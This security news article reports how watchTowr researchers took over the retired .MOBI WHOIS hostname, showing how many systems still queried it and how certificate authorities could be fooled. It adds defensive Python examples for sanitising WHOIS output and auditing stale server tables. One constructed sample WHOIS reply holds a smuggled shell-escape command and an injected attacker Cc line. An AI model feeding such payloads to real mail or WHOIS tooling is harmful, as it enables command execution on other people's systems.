Researchers from watchTowr Labs have published the results of an experiment in which they took over the retired WHOIS server hostname of the .MOBI top-level domain. The study was prompted by the registry changing the address of its WHOIS service, moving it from whois.dotmobiregistry.net to a new host, whois.nic.mobi. The domain dotmobiregistry.net was no longer used; it expired in December 2023 and became available for registration.
The researchers spent $20 to buy the domain and then ran their own dummy whois.dotmobiregistry.net WHOIS service on a server under their control. Surprisingly, many systems had never switched to the new host whois.nic.mobi and kept querying the old name. Between August 30 and September 4 of 2024, the server logged 2.5 million requests for the old name, sent from more than 135 thousand unique systems.
The senders included mail servers of government and military organizations that validate email domains via WHOIS, security companies and security platforms (VirusTotal, Group-IB), as well as certificate authorities, domain verification services, SEO services and domain registrars (e.g. domain.com, godaddy.com, who.is, whois.ru, smallseo.tools, seocheki.net, centralops.net, name.com, urlscan.io and webchart.org).
Being able to return arbitrary data in response to queries to the old .MOBI WHOIS service could be used to attack the systems sending those queries. The first proposed attack rests on the assumption that anyone still querying a long-replaced service is probably doing so with outdated tooling that contains known vulnerabilities. For example, CVE-2015-5243, identified in phpWhois in 2015, allowed attacker-supplied code to be executed when the library parsed specially crafted data returned by a WHOIS server.
Among WHOIS-related vulnerabilities the researchers also mention CVE-2021-32749 in Fail2Ban, identified in 2021, which allows code execution when malformed data is returned by the WHOIS service consulted while generating a ban report with the mail-whois action: Fail2Ban passed the WHOIS server's response to the mail command without escaping, so a "~!" tilde escape embedded in the response was interpreted as a shell command. However, that query looks up the banned IP address rather than a domain, i.e. the vulnerability is not applicable in the .MOBI situation.
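The Fail2Ban case above is a plain untrusted-input-into-an-interpreter bug: the WHOIS answer becomes the body of a message handed to a mail client that honours tilde escapes. The block below is an added example, not Fail2Ban's code or the researchers' code. It assumes classic mailx semantics (a line whose first character is "~" is an escape, "~!cmd" runs cmd in a shell, "~~" yields a literal tilde) and that the client applies them to piped input; simulate_mail only records what such a client would do and executes nothing. The WHOIS reply it works on is constructed.

```python
"""Added example (not Fail2Ban's code): the failure mode behind feeding
untrusted WHOIS output to a mail client that honours tilde escapes, next to
a sanitiser that defuses them.

Assumptions (hypothetical, not from the page): a line starting with '~' is
an escape, '~!cmd' runs cmd in a shell, '~~' yields a literal tilde, and the
client applies this to piped input. simulate_mail executes nothing."""
from typing import List, Tuple

# Constructed WHOIS reply as a rogue server could return it; the third line
# is the payload and the fourth would add a Cc recipient.
HOSTILE_WHOIS = (
    "Domain Name: example.mobi\n"
    "Registrant Email: abuse@example.mobi\n"
    "~!id > /tmp/pwned\n"
    "~c attacker@example.net\n"
    "Name Server: ns1.example.mobi\n"
)


def find_escapes(text: str) -> List[str]:
    """Lines the mail client would interpret rather than send as body text."""
    return [line for line in text.splitlines() if line.startswith("~")]


def simulate_mail(text: str) -> Tuple[List[str], List[str]]:
    """Model of an escape-aware mail client reading `text` as the message body.

    Returns (body lines that would be sent, shell commands that would be run)."""
    body: List[str] = []
    shell: List[str] = []
    for line in text.splitlines():
        if line.startswith("~~"):
            body.append(line[1:])        # '~~' becomes a literal '~'
        elif line.startswith("~!"):
            shell.append(line[2:])       # '~!' hands the rest of the line to a shell
        elif line.startswith("~"):
            pass                         # other escapes (~c, ~s, ...) change headers, not body
        else:
            body.append(line)
    return body, shell


def neutralise_escapes(text: str) -> str:
    """Double every leading tilde so the client inserts it literally."""
    out = [("~" + line) if line.startswith("~") else line for line in text.splitlines()]
    return "\n".join(out) + ("\n" if text.endswith("\n") else "")


def ban_report(ip: str, whois_text: str) -> str:
    """Body for a mail-whois style ban report with the untrusted part defused."""
    return f"The IP {ip} has just been banned.\n\nWHOIS:\n{neutralise_escapes(whois_text)}"


if __name__ == "__main__":
    print("raw:      ", simulate_mail(HOSTILE_WHOIS))
    print("sanitised:", simulate_mail(ban_report("192.0.2.10", HOSTILE_WHOIS)))
```

Doubling the tilde is the minimal in-band fix; the more robust one is to hand the report to a program that never interprets its body at all, so that the question of which escape characters exist does not arise.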
The second variant of the attack relies on the fact that some certificate authorities let a requester prove domain ownership through the contact email recorded in the registrar's database and exposed over the WHOIS protocol. It turned out that several certificate authorities supporting this validation method were still using the old WHOIS server for the .MOBI zone.
Thus, with control over the whois.dotmobiregistry.net name, an attacker can return their own contact data, pass the validation and obtain a TLS certificate for any domain in the .MOBI zone. In the experiment, the researchers requested a TLS certificate for the domain microsoft.mobi from the certificate authority GlobalSign, and the address "whois@watchTowr.com" returned by their dummy WHOIS service was offered in the CA's interface as a destination for the domain ownership verification code.
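Both findings, the 135 thousand systems still querying the retired hostname and the CAs that built domain validation on it, come from the same root cause: a TLD-to-WHOIS-server mapping baked into the tool and never reconciled with what IANA currently publishes, over a port-43 protocol that authenticates nothing. The block below is an added example, not watchTowr's, a registry's or any CA's code. It audits such a hard-coded table against IANA's referral for each TLD and shows the RDAP bootstrap lookup that gives an HTTPS endpoint instead. The stale table, the IANA replies, the RDAP bootstrap document (in the shape of data.iana.org/rdap/dns.json, with hypothetical URLs) and the rogue WHOIS record are all constructed so that the block runs offline; tcp_send is the real transport and is not exercised here.

```python
"""Added example (not watchTowr's, a registry's or any CA's code): audit a
hard-coded TLD -> WHOIS server table against IANA's live referral and resolve
the RDAP base URL instead, so a retired hostname is caught before anything
trusts its answers.

Assumptions: STALE_WHOIS_SERVERS is a constructed stand-in for the mapping a
legacy tool might ship; IANA_REPLIES and IANA_RDAP_BOOTSTRAP are constructed
samples in the real formats (RDAP URLs hypothetical); ROGUE_MOBI_RECORD is
constructed."""
import json
import re
import socket
from typing import Callable, Dict, List, Optional, Tuple

STALE_WHOIS_SERVERS = {
    "mobi": "whois.dotmobiregistry.net",  # the retired hostname from the article
    "com": "whois.verisign-grs.com",
}

# Constructed samples of whois.iana.org replies; only the 'whois:' field is used.
IANA_REPLIES = {
    "mobi": "% IANA WHOIS server\ndomain:       MOBI\nwhois:        whois.nic.mobi\nstatus:       ACTIVE\n",
    "com": "% IANA WHOIS server\ndomain:       COM\nwhois:        whois.verisign-grs.com\nstatus:       ACTIVE\n",
}

# Constructed sample in the shape of https://data.iana.org/rdap/dns.json (URLs hypothetical).
IANA_RDAP_BOOTSTRAP = json.dumps({
    "version": "1.0",
    "publication": "2024-09-01T00:00:00Z",
    "description": "constructed sample",
    "services": [
        [["mobi"], ["https://rdap.example-mobi-registry.test/"]],
        [["com"], ["http://rdap.example-com-registry.test/", "https://rdap.example-com-registry.test/"]],
    ],
})

# Constructed record such as a rogue server at the old hostname could return.
ROGUE_MOBI_RECORD = "Domain Name: microsoft.mobi\nRegistrant Email: whois@watchTowr.com\n"

Transport = Callable[[str, str], str]


def tcp_send(host: str, query: str, timeout: float = 10.0) -> str:
    """Real transport: one WHOIS query on TCP/43. Nothing authenticates the answer."""
    with socket.create_connection((host, 43), timeout=timeout) as s:
        s.sendall(query.encode("ascii"))
        chunks = []
        while chunk := s.recv(4096):
            chunks.append(chunk)
    return b"".join(chunks).decode("utf-8", "replace")


def offline_send(host: str, query: str) -> str:
    """Stand-in transport answering from the constructed IANA samples."""
    tld = query.strip().lower()
    if host == "whois.iana.org" and tld in IANA_REPLIES:
        return IANA_REPLIES[tld]
    raise ConnectionError(f"no constructed answer for {query.strip()!r} at {host}")


def iana_whois_referral(tld: str, send: Transport = tcp_send) -> Optional[str]:
    """Return the WHOIS server IANA currently lists for the TLD, or None if absent."""
    reply = send("whois.iana.org", tld.strip().lower() + "\r\n")
    m = re.search(r"^whois:\s*(\S+)\s*$", reply, re.MULTILINE | re.IGNORECASE)
    return m.group(1).lower() if m else None


def audit_hardcoded_servers(table: Dict[str, str], send: Transport = tcp_send) -> Dict[str, Tuple[str, Optional[str]]]:
    """Map each TLD whose configured server no longer matches IANA to (configured, current)."""
    stale: Dict[str, Tuple[str, Optional[str]]] = {}
    for tld, configured in table.items():
        current = iana_whois_referral(tld, send)
        if current != configured.lower():
            stale[tld] = (configured, current)
    return stale


def rdap_base_urls(bootstrap_json: str, tld: str) -> List[str]:
    """HTTPS RDAP base URLs for the TLD from an IANA bootstrap document; plain-http entries are dropped."""
    data = json.loads(bootstrap_json)
    wanted = tld.strip().lower()
    for tlds, urls in data["services"]:
        if wanted in (t.lower() for t in tlds):
            return [u for u in urls if u.startswith("https://")]
    return []


def registrant_email(record: str) -> Optional[str]:
    """The field a WHOIS-based DV flow would mail; over TCP/43 it is whatever the server chose to say."""
    m = re.search(r"^Registrant Email:\s*(\S+)\s*$", record, re.MULTILINE | re.IGNORECASE)
    return m.group(1).lower() if m else None


if __name__ == "__main__":
    for tld, (old, new) in audit_hardcoded_servers(STALE_WHOIS_SERVERS, offline_send).items():
        print(f"{tld}: configured {old}, IANA now says {new}; RDAP: {rdap_base_urls(IANA_RDAP_BOOTSTRAP, tld)}")
    print("DV contact a rogue server can inject:", registrant_email(ROGUE_MOBI_RECORD))
```

Run with the default transport to audit a real table; the audit only says whether the configured host is the one IANA lists today, it does not make the port-43 answer trustworthy, which is why the RDAP lookup is the branch a DV flow should actually take.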